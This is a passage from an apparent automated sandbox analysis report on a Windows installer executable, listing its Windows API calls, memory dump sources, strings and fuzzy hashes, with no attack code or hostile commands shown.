                                                                                      • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\LrBF2Z930N.exe,80000000,00000003), ref: 00406176
                                                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                                                      • API String ID: 2171350718-2529913679
                                                                                      • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                                      • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                                                      • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                                                      • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                                      • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                                                      • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                                                      • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                                                      APIs
                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LrBF2Z930N.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\LrBF2Z930N.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                                      • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                                      Strings
                                                                                      • *?|<>/":, xrefs: 00406982
                                                                                      • "C:\Users\user\Desktop\LrBF2Z930N.exe", xrefs: 00406974
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406931
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\LrBF2Z930N.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-2843884913
                                                                                      • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                      • Instruction ID: f71de53da442769783aaa0cb2fea73a85be5ebad64e4744dd58b15c84f46a956
                                                                                      • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                      • Instruction Fuzzy Hash: 2211C8A580021295DB303B548D40B7766F8AF59790F56403FED96B3AC1E77C4C9282BD
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404685
                                                                                      • GetSysColor.USER32(00000000), ref: 004046C3
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 004046CF
                                                                                      • SetBkMode.GDI32(?,?), ref: 004046DB
                                                                                      • GetSysColor.USER32(?), ref: 004046EE
                                                                                      • SetBkColor.GDI32(?,?), ref: 004046FE
                                                                                      • DeleteObject.GDI32(?), ref: 00404718
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404722
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                      • Instruction ID: a82f55cf926b6e885627a74f3bab1bdd796941bf972b84b6a5e459a8b365bc4c
                                                                                      • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                      • Instruction Fuzzy Hash: 5C2177715007449BC7309F78DD48B577BF4AF42715B04893DEA96A36E0D738E944CB58
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                      • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                      • lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                      • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2531174081-0
                                                                                      • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                                      • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                                                      • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                                                      • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 0040304E
                                                                                      • GetTickCount.KERNEL32 ref: 0040306C
                                                                                      • wsprintfW.USER32 ref: 0040309A
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 004030CC
                                                                                        • Part of subcall function 00403017: MulDiv.KERNEL32(00000000,00000064,000025B1), ref: 0040302C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 722711167-2449383134
                                                                                      • Opcode ID: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                                      • Instruction ID: 5115fc65002d889466af77c95cd87ea57bd417394e766d10746fa218fe5c3c06
                                                                                      • Opcode Fuzzy Hash: 08ac34a4e5fc7f4836fd10a2a84a83e51d98fc20e7055cc4174bcdc419dd85dd
                                                                                      • Instruction Fuzzy Hash: CA01C830642610E7CB31AF50AE09A6B3FACAB04706F64043BF441B11D9D6B85A51CF9D
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FD7
                                                                                      • GetMessagePos.USER32 ref: 00404FDF
                                                                                      • ScreenToClient.USER32(?,?), ref: 00404FF9
                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040500B
                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405031
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                      • Instruction ID: f32abc49a7be06d84d864a503b70a66925f192d82b82ee1d40ead4c3c6165fb8
                                                                                      • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                      • Instruction Fuzzy Hash: 79015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B4AA058BA5
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                      • wsprintfW.USER32 ref: 00402FEA
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402FFA
                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                      • API String ID: 1451636040-1158693248
                                                                                      • Opcode ID: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                                      • Instruction ID: 34bde3d48a8f942e304b41271f5ed33cd318c4bcfffe3c394610842cbdf8d478
                                                                                      • Opcode Fuzzy Hash: 66e00694bf9c2fcf5817c91216ca696d61ea9415c1ed8b1f40767934bfa15992
                                                                                      • Instruction Fuzzy Hash: 10F0317054020CABEF249F60DD4ABEE3B68EB40349F00C03AF606B51D0DBB99A55DB99
                                                                                      APIs
                                                                                        • Part of subcall function 6E3912BB: GlobalAlloc.KERNELBASE(00000040,?,6E3912DB,?,6E39137F,00000019,6E3911CA,-000000A0), ref: 6E3912C5
                                                                                      • GlobalFree.KERNEL32(?), ref: 6E392743
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6E392778
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: c8c263d0efc9a181207d9a9bef9bec0e707cc9208850a41f5b6e6534c3d5db1e
                                                                                      • Instruction ID: f742f96c3d8212a50df19170ecfe0d29b74d3c9614ace70fc6ac5f8ccffee94a
                                                                                      • Opcode Fuzzy Hash: c8c263d0efc9a181207d9a9bef9bec0e707cc9208850a41f5b6e6534c3d5db1e
                                                                                      • Instruction Fuzzy Hash: 8431D031104901EFCB159FA5EAD4C6AB7BEFB873053214568F141A3211F7339846EB62
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                      • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                                      • Instruction ID: 0665ed67c6e74a6a0a4f3ff5189880cf350c83190f31c90c7548f1ee6fedf688
                                                                                      • Opcode Fuzzy Hash: 99a72b25e835b2ea7940c93163da3ca2f710589d23dcac0e6d207047e8163098
                                                                                      • Instruction Fuzzy Hash: 5731CF71D00124BBCF21AFA5CD89D9E7EB9AF48364F10023AF511762E1CB794C429B98
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                                      • wsprintfW.USER32 ref: 00404F58
                                                                                      • SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s$H/B
                                                                                      • API String ID: 3540041739-2222257793
                                                                                      • Opcode ID: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                                      • Instruction ID: 614c6b03a1206c52a907a8f7c7d2435543e043070c0789599254521b237785a9
                                                                                      • Opcode Fuzzy Hash: 701484786e9e788ccce1f8e608fe17be4446b7c9895a13b6126df495f4584910
                                                                                      • Instruction Fuzzy Hash: D911D5336041287BDB00666D9C45E9E329CEB85374F254637FA25F31D1EA79C82282E8
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3424771390.000000006E391000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E390000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3422340994.000000006E390000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429717707.000000006E394000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3429758599.000000006E396000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6e390000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeGlobal
                                                                                      • String ID:
                                                                                      • API String ID: 2979337801-0
                                                                                      • Opcode ID: fcb2effe4c6ed3b6966d5c269c3ab42fb7af0b91e3e51c8dbbb25e37af794a25
